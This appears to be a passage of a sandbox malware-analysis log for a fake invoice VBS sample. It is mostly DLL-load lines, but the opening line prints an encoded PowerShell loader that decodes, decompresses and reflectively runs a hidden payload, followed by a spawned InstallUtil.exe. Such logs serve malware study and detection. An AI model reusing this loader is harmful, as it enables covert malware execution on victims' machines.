                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAJump to behavior
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: twext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: workfoldersshell.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: shacct.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: idstore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: starttiledata.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wlidprov.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: provsvc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: usermgrproxy.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: acppage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: atl.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: twext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: workfoldersshell.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: shacct.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: idstore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: starttiledata.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wlidprov.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: provsvc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: usermgrproxy.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: acppage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: atl.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: msisip.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: wshext.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: appxsip.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: opcservices.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windowscodecs.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: napinsp.dll
